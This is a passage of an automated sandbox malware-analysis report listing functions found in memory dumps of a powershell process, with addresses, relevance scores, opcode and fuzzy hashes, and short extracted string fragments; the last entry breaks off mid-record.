                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful
                                                      • API String ID: 0-517230495
                                                      • Opcode ID: be96e6fba4cdbbcfa6e4ba8e9c2145d4c6da9c544c3c73f18b5c6f7a864715a6
                                                      • Instruction ID: 8eebc2dbf56681607f4ea38facd5aeaeb0faf0a5fa85061b82d3a530519f5d3e
                                                      • Opcode Fuzzy Hash: be96e6fba4cdbbcfa6e4ba8e9c2145d4c6da9c544c3c73f18b5c6f7a864715a6
                                                      • Instruction Fuzzy Hash: 6D222AB4A00245DFDB14CF98D941EAABBB2EF85314F15C16AE8055F756CB72EC82CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074545E5 Relevance: 1.7, Strings: 1, Instructions: 490COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful
                                                      • API String ID: 0-517230495
                                                      • Opcode ID: c6ade1aa33c331029a1c0b28dcd987e372d311073b0bb8213351dc812dc505df
                                                      • Instruction ID: 620e9ae06d3858c0988de8778f8315914b6abc985e518e4dd9b4e22c5b326705
                                                      • Opcode Fuzzy Hash: c6ade1aa33c331029a1c0b28dcd987e372d311073b0bb8213351dc812dc505df
                                                      • Instruction Fuzzy Hash: 3F2219B4A00245DFDB14CF98D941AAABBB2EF85314F15C16AE9095F756CB72EC82CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07451624 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful
                                                      • API String ID: 0-517230495
                                                      • Opcode ID: dc1bd2d8800c1f8a092619e16b10b85f4565d67373ea3eed8aa0e0a2e11d19ef
                                                      • Instruction ID: d777d56290e9c9613f7f48b1e3f6c933fc11c905138b47c997ebcb1233a3c90e
                                                      • Opcode Fuzzy Hash: dc1bd2d8800c1f8a092619e16b10b85f4565d67373ea3eed8aa0e0a2e11d19ef
                                                      • Instruction Fuzzy Hash: C6F139B4A00209DFDB14CF59C550EAABBF2BF89314F15C16AE9199B356C732EC42CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074554C0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x.fk
                                                      • API String ID: 0-1423657076
                                                      • Opcode ID: 196765c87b532f8be93dcfa0ca72203647721ad960fec15fd2607f45f3136568
                                                      • Instruction ID: 810422bf2118fe06d75d3fe69a2ad55c641694b0a061acb3c48244bda59e46f9
                                                      • Opcode Fuzzy Hash: 196765c87b532f8be93dcfa0ca72203647721ad960fec15fd2607f45f3136568
                                                      • Instruction Fuzzy Hash: 8131D4B1B40204AFD704AB68C911FAF7BA3EBC4300F108825E9016F7A5CE76ED528BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745559D Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x.fk
                                                      • API String ID: 0-1423657076
                                                      • Opcode ID: 9fd8152d3338a5732ce999c65c7e01d6fc9b77510e9c29ccdf532505b2290804
                                                      • Instruction ID: 8d8816635e86647edc2c9976fa2733eb17bfac9609f6f14fc5dc415de517ac21
                                                      • Opcode Fuzzy Hash: 9fd8152d3338a5732ce999c65c7e01d6fc9b77510e9c29ccdf532505b2290804
                                                      • Instruction Fuzzy Hash: FF21B2B1A50204DFD7049B68C945FEFBBB3EB84314F108925E9056F362CA76DD518B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491ADE0 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc02bc5dbecb6a1806eb37ceb04a6fd60cc4d1d7315bfc9040fa35e56ba0d854
                                                      • Instruction ID: efe13a34c2acf84ebd0321e51cbe71c418bd62f9f2b43a1dd006b4a472e1c8d4
                                                      • Opcode Fuzzy Hash: fc02bc5dbecb6a1806eb37ceb04a6fd60cc4d1d7315bfc9040fa35e56ba0d854
                                                      • Instruction Fuzzy Hash: 58F11A74A01209DFDB15CF98D584A9DBBB2FF88310F258569E815AB365C731ED82CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049172A8 Relevance: .3, Instructions: 313COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d18e396fb4702f530116f4d1efb92fb427ac0dbca85300842878350bda4e2d27
                                                      • Instruction ID: 61e28c90a06a7abfe0ece5db33080d8a373c730ccec6b4425e78a9d70f6e8ca6
                                                      • Opcode Fuzzy Hash: d18e396fb4702f530116f4d1efb92fb427ac0dbca85300842878350bda4e2d27
                                                      • Instruction Fuzzy Hash: 6FC1BE35A002099FCB14DFE4D944A9DBBB6FF85310F2585A9E406AB365DB34ED8ACB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491F8C4 Relevance: .3, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20b7612757dfcb3ff2893e7f13b471e3f37974bae49945f97cde0db539173015
                                                      • Instruction ID: 5ff0a7588ae6f19ce5de8e97bf212d15300243f07ada2194e5d86819a68536f0
                                                      • Opcode Fuzzy Hash: 20b7612757dfcb3ff2893e7f13b471e3f37974bae49945f97cde0db539173015
                                                      • Instruction Fuzzy Hash: D2B15C70E0020EDFDB10DFA8D99579DBBF5BF48314F148539D819AB268EB74A885CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04912AA0 Relevance: .2, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0ef3e39e218851360541d6adb5095653cee14273f37ade4442f763646fd107c
                                                      • Instruction ID: a28e446a91daa5a7f02aa3d4ea0ca9a014616d9d5fd316879844a6da1e3c46e6
                                                      • Opcode Fuzzy Hash: b0ef3e39e218851360541d6adb5095653cee14273f37ade4442f763646fd107c
                                                      • Instruction Fuzzy Hash: CDA1D274A042498FC706DF59C4949AEFBB1FF49310B2485AAD445EB3A5C735FC41CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04917A70 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37def5f29fd584caf0d88e8716dcdca798511d55fcc36f25930791c006813a61
                                                      • Instruction ID: cc9f9478dd6b1f5b37bd9128c8d676343b7744183e978298a4fc12df7464c231
                                                      • Opcode Fuzzy Hash: 37def5f29fd584caf0d88e8716dcdca798511d55fcc36f25930791c006813a61
                                                      • Instruction Fuzzy Hash: 49719F70A002498FCB14DFA8D884A9DBBF6FF85314F1489B9D415DB665DB31AC46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04917BDE Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c75f781bc6642a19756732d3013734b92da2f1059f820bda511938c9ddd09aa5
                                                      • Instruction ID: c8ba5d797b891a8605555b7f2306f2829bbb896527f2867c7807a46f98093bee
                                                      • Opcode Fuzzy Hash: c75f781bc6642a19756732d3013734b92da2f1059f820bda511938c9ddd09aa5
                                                      • Instruction Fuzzy Hash: 8A714E70A00219DFDB14DFB4D884BADBBF6BF88304F148469D412AB7A5DB35AD46CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07457DCC Relevance: .1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e4e8d5541a5c691cad5f39c6b29c7a5462369db7d9042ecff1f980299da56cf
                                                      • Instruction ID: c9f0b7d2d73c1c6bb72fde0f56fa016674e7ca3e45fd44c486e1aa7a23ff9723
                                                      • Opcode Fuzzy Hash: 6e4e8d5541a5c691cad5f39c6b29c7a5462369db7d9042ecff1f980299da56cf
                                                      • Instruction Fuzzy Hash: AC41D6F2A10302DFCB22CF248951AEB7BA2AB85214B1540BBDD049B357DB35DD55C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491780A Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fd8ea32d06451ebf42c29715d6bb23c47bfaaf4f230ac07f0ad1df194503400
                                                      • Instruction ID: 756f49c86be64522071f94bd75304e07f5f33954e3036827fb4bcc29f993a0fe
                                                      • Opcode Fuzzy Hash: 1fd8ea32d06451ebf42c29715d6bb23c47bfaaf4f230ac07f0ad1df194503400
                                                      • Instruction Fuzzy Hash: A8416C39B002098FDB14DF65C954BAE7BB6EF88351F1444A9E406EB3B0DB35AD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491B0E7 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec6e2a7b56f04309ab8167f3f2fb8a54d0e36ef666efb2ef962288c1df78de90
                                                      • Instruction ID: 53ac0f9a51c859a6eaad85cb9823e11d7e74df381e0e89680996284aa7bdf658
                                                      • Opcode Fuzzy Hash: ec6e2a7b56f04309ab8167f3f2fb8a54d0e36ef666efb2ef962288c1df78de90
                                                      • Instruction Fuzzy Hash: D451E674A00209EFDB05CF98D584A9DFBB2FF88310F248559E404AB365C736ED86CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04917A5B Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84f5e85f37ec288becc107c67aa870592739b421151f527dabbe1f565e634153
                                                      • Instruction ID: a4fc70621459957cb5f6e3c237ba9788b50da3d16b2118d37fb2ca263f50a92d
                                                      • Opcode Fuzzy Hash: 84f5e85f37ec288becc107c67aa870592739b421151f527dabbe1f565e634153
                                                      • Instruction Fuzzy Hash: 62418C70A002099FDB14DFA9C894BADBBF2BF88304F14847DD402AB7A5DB75A945CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04912BB0 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14a162c371fe47b442b41accaf628189d9377498dcccd8e0f15188779515f93a
                                                      • Instruction ID: befe3a4e3588d1c6383c691fdb30113c464fe98e1c48e734822440e8affd11c4
                                                      • Opcode Fuzzy Hash: 14a162c371fe47b442b41accaf628189d9377498dcccd8e0f15188779515f93a
                                                      • Instruction Fuzzy Hash: 534169B8A001099FCB09CF59C5949AEFBB1FF48310B1185A9D905AB3A4C736FC50CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074513E8 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbf66315f05e689f972cda0c31af5df9e6dd9c955d541a31083b5e3063c7671
                                                      • Instruction ID: 2a58dd74d8335043360f25565ea73abfb127ac2451a52b222217ac38f206c08c
                                                      • Opcode Fuzzy Hash: 2fbf66315f05e689f972cda0c31af5df9e6dd9c955d541a31083b5e3063c7671
                                                      • Instruction Fuzzy Hash: 132149B134024A6BDB345ABA8901BBB76C79BC6315F24C43BA905CB383EE35D881C360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491C5C8 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b922f7f81bfe93414258cb127d85194d988d475fb3086e18b241df98f0e25db8
                                                      • Instruction ID: 8be94e9496f7fec8edeccc6d3f06f06d22516b8b03808d1af88c3235e260187a
                                                      • Opcode Fuzzy Hash: b922f7f81bfe93414258cb127d85194d988d475fb3086e18b241df98f0e25db8
                                                      • Instruction Fuzzy Hash: 0B311B30A042189FCB25DB64D8517EEBBB6AF89345F1044E9D40AAB361CB35AE85CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491ADD0 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5330a3d9e9d01bc823767f4a2fc7d828e2a654ff73ea312abf55fd0bdb344d2f
                                                      • Instruction ID: 0cf943eb10fd7c66d238daa5a2c09f463f41818bb72a8706c5ced18079a1d240
                                                      • Opcode Fuzzy Hash: 5330a3d9e9d01bc823767f4a2fc7d828e2a654ff73ea312abf55fd0bdb344d2f
                                                      • Instruction Fuzzy Hash: 21312774A0060ADFCB14CF99C5849AAFBB1FF48310B2586A9D859EB3A5C331FC51CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074513CC Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08a882e357d1da21f89a9ba26d3b0e42505194434e587d6fbbb731e372bfd6c6
                                                      • Instruction ID: f0e3e8a84b9f32a1c165d6c937767dd4c92027190e071316cd52d59401c09c69
                                                      • Opcode Fuzzy Hash: 08a882e357d1da21f89a9ba26d3b0e42505194434e587d6fbbb731e372bfd6c6
                                                      • Instruction Fuzzy Hash: 06214CB130438A6BDB354A7649117F73F965F82304F28846BE940CB3D3EA399985C321
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074511D8 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 603e04287804d178caab95c83ce48d229ad956a0885b5e70e6b3eecea5aa6edc
                                                      • Instruction ID: ed5003d40f6f801db71b2b74848ecb471caa3caa23f7ceb1402a53f70075efaf
                                                      • Opcode Fuzzy Hash: 603e04287804d178caab95c83ce48d229ad956a0885b5e70e6b3eecea5aa6edc
                                                      • Instruction Fuzzy Hash: E601F77631021A8BCB2455AAA4007BBB79ADBC6222F14C83FED55D7752D636C846C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491B1F4 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b470c0d3320bca73b274c86212a8c44bdbf9be94fadf4237965010c75b3b2383
                                                      • Instruction ID: c82558be209b35c98a87d8b25b90c5371e2d56e3357b7bc710d1860af768bf78
                                                      • Opcode Fuzzy Hash: b470c0d3320bca73b274c86212a8c44bdbf9be94fadf4237965010c75b3b2383
                                                      • Instruction Fuzzy Hash: FD11C634A00209AFDB05CF98D884E9DFBB2FF48314F298558E405AB365C771B886CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00C2D005 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194064519.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_c2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 841931d0a17c2f5a3bb18d9f77396e7a305e049103085433441ea6d69131cc7f
                                                      • Instruction ID: 60adf5850f9b4f02fb3c3f5da2afb0c72a7d7627d4515719a75a69b85f56a541
                                                      • Opcode Fuzzy Hash: 841931d0a17c2f5a3bb18d9f77396e7a305e049103085433441ea6d69131cc7f
                                                      • Instruction Fuzzy Hash: C4014C6100E3C09ED7128B259C94B52BFB4EF53224F1DC0DBD8988F1A3C2699C49C772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00C2D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194064519.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_c2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70c45552e9f05bff5bbbe4c9ae7ed41c0ad6b9401653ad61f0b839f170c1992c
                                                      • Instruction ID: cac870ca395027fa2e81a1c6dbc9f354ff68ac6dc9a05328eb095eaddcb3375b
                                                      • Opcode Fuzzy Hash: 70c45552e9f05bff5bbbe4c9ae7ed41c0ad6b9401653ad61f0b839f170c1992c
                                                      • Instruction Fuzzy Hash: 93012B310083109EE7104A2AEDC4767BF98EF61324F18C429EC5A4F556C679DD81C6B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07451D87 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2377e93b61963aaa7b41fdef540accb4c01f34470340d0171542db1f868f7815
                                                      • Instruction ID: 17403f708eef190881b4b872a36fe84b1cccaea283f45285482b395b8c6ed095
                                                      • Opcode Fuzzy Hash: 2377e93b61963aaa7b41fdef540accb4c01f34470340d0171542db1f868f7815
                                                      • Instruction Fuzzy Hash: 7FB012712061404FC301CB10C850440BB209FA310431CC0CAD4048F263DB33DE0BD700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 07457418 Relevance: 20.5, Strings: 16, Instructions: 472COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,Sul$,Sul$4'kq$4'kq$4'kq$4'kq$d5ek$tPkq$tPkq$xSul$$kq$$kq$$kq$$kq$kl$kl
                                                      • API String ID: 0-2423150153
                                                      • Opcode ID: 50dcbfa56ef7b61492e11a07705227760e4afa09a61d239dff1aece27b14901e
                                                      • Instruction ID: 75d9470845b465e799c71fb8d202b06cca17be947be8358268e2d0908de6de41
                                                      • Opcode Fuzzy Hash: 50dcbfa56ef7b61492e11a07705227760e4afa09a61d239dff1aece27b14901e
                                                      • Instruction Fuzzy Hash: 95E15DB1B043569FCB264B7898017EBBFA2AF82310F2484BBD945CB353DA35D855C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07457A28 Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$kl$kl
                                                      • API String ID: 0-2144872774
                                                      • Opcode ID: 58b1a8caa3629f26aeedc6ea6a6fd4bbe9114f0b0cf1937f9b3187b00440ece6
                                                      • Instruction ID: 7617b94947d34cbdbb6b27dc67ffdc12f0c5f63643bb5b2bfb231e1490df5193
                                                      • Opcode Fuzzy Hash: 58b1a8caa3629f26aeedc6ea6a6fd4bbe9114f0b0cf1937f9b3187b00440ece6
                                                      • Instruction Fuzzy Hash: 55A149B13043459FC7269B6998006BBBBF6AFC6210F24847BD905CB393DA35DD46C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745E860 Relevance: 11.5, Strings: 9, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$84sl$84sl$tPkq$tPkq$$kq$(qq$(qq$(qq
                                                      • API String ID: 0-4182690792
                                                      • Opcode ID: 0913ed81e4be8a2a84660103ea3d40833d8ca2a5ea42b65f67b9eb3e590033cb
                                                      • Instruction ID: af35749d6a98adef0a0f28cff6a1cae0fff834517fbf54f7e443722dd313d5f8
                                                      • Opcode Fuzzy Hash: 0913ed81e4be8a2a84660103ea3d40833d8ca2a5ea42b65f67b9eb3e590033cb
                                                      • Instruction Fuzzy Hash: 3A71B3B0A042669FDB28CF14C540BEBBBA1BB85311F198457EC05AF392D731DE81CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745A6C9 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq
                                                      • API String ID: 0-1263425659
                                                      • Opcode ID: 7b29266f56cbfb17529ef82dcb3c41cf3f3b8a5a2011b308f7fade18e5eab81a
                                                      • Instruction ID: 4ff081cb091dba6e48a23b4f82150a89d8181a5ba457a7e547ba781f31dcd4c3
                                                      • Opcode Fuzzy Hash: 7b29266f56cbfb17529ef82dcb3c41cf3f3b8a5a2011b308f7fade18e5eab81a
                                                      • Instruction Fuzzy Hash: 9251D4B1B002059FDB289F64D5106EBBFA2AF85210F24C66BDC119F396DB36D847CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07458638 Relevance: 9.0, Strings: 7, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Tek$4'kq$4'kq$XYul$XYul$tPkq$tPkq
                                                      • API String ID: 0-1630410640
                                                      • Opcode ID: d4a00819638fac8c9a01427b9b2baaae0de4d90f239de12cfa5b82a1b3071f12
                                                      • Instruction ID: 188bde2c896369c7e7995bc74c9364434dbbfbe69e7d8448a1d21814c8c299ba
